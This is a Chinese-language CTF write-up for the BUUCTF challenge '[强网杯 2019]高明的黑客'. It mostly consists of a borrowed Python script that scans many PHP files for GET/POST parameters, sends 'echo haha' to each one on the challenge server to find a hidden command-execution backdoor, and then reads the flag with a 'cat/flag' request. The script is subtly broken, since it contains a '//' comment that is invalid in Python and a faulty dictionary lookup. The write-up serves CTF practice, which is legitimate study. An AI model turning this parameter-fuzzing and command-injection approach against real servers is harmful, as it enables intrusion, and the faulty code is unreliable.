CTF-BUUCTF-Web-[强网杯 2019]高明的黑客

CTF-BUUCTF-Web-[强网杯 2019]高明的黑客

如题：

解题：

没看到其他任何提示，直接down下源码

我的娘哦！这要看到何时去？
盲猜大概要自己写脚本，然后分析代码

[致敬大佬，借用脚本]:

https://blog.csdn.net/xiayu729100940/article/details/102676405

import os
import requests
import re
import time

def read_file(path, command):  #遍历文件找出所有可用的参数
    with open(path,encoding="utf-8") as file:
        f = file.read()
    params = {}
    pattern = re.compile("(?<=\$_GET\[').*?(?='\])")  #match get
    for name in pattern.findall( f ):
        params[name] = command

    data = {}
    pattern = re.compile("(?<=\$_POST\[').*?(?='\])")  #match get
    for name in pattern.findall( f ):
        data[name] = command
    return params, data

def url_explosion(url, path, command):   #确定有效的php文件
    params, data = read_file(path,command)
    try:
        r = requests.session().post(url, data = data, params = params)
        if r.text.find("haha") != -1 :
            print(url,"\n")
            find_params(url, params, data)         

    except:
        print(url,"异常")
   
def find_params(url, params, data):   #确定最终的有效参数
    try:
        for pa in params.keys():
            temp = {pa:params[pa]}
            r = requests.session().post(url, params = temp)
            if r.text.find("haha") != -1 :
                print(pa)
                os.system("pause")
                
    except:
        print("error!\n")
    try:
        for da in data.items():
            temp = {da:data[da]}
            r = requests.session().post(url, data = temp)
            if r.text.find("haha") != -1 :
                print(da) 
                os.system("pause")
    except:
        print("error!\n")


rootdir = "C:\\src\\"  #php文件存放地址
list = os.listdir(rootdir)
for i in range(0, len(list)):
    path = os.path.join(rootdir ,list[i])
    name = list[i].split('-2')[0]   //获取文件名
    url = "http://8d40e217-717b-4548-a15e-c131a87bdb1d.node3.buuoj.cn/" + name
    url_explosion(url,path,"echo haha")  

得到链接：
http://f4cefef7-b3f2-44d5-8219-53a08291bf93.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=

http://f4cefef7-b3f2-44d5-8219-53a08291bf93.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=cat/flag